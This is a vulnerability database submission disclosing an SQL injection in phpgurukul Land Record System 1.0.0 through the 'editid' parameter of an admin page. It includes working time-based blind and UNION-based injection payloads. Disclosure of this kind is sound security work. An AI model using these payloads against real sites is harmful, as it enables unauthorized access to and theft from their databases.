Submit #472188: phpgurukul Land Record System 1.0.0 SQL Injectioninfo

Titlephpgurukul Land Record System 1.0.0 SQL Injection
DescriptionIn the file property-details.php located at '/landrecordsys/admin/property-details.php?editid=1', there is a possibility of performing SQL injection on the 'editid=' parameter. This allows attackers to inject malicious SQL code into the query. For example, if the 'editid=' parameter is set to: For time-based blind: Payload: editid=' AND (SELECT 9718 FROM (SELECT(SLEEP(5)))KpHQ) AND 'sXVm'='sXVm For UNION query: Payload: editid=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b707a71,0x666c4562427a6745626e766d43786b66526256496c5a5a565551494b414c4d6768506d4369594f77,0x717a7a7a71),NULL,NULL,NULL-- -
Source⚠️ https://phpgurukul.com/land-record-system-using-php-and-mysql/
User
 Havook (UID 71104)
Submission12/30/2024 05:17 PM (2 months ago)
Moderation12/31/2024 09:58 AM (17 hours later)
StatusAccepted
VulDB Entry289832 [PHPGurukul Land Record System 1.0 property-details.php editid sql injection]
Points20

Might our Artificial Intelligence support you?

Check our Alexa App!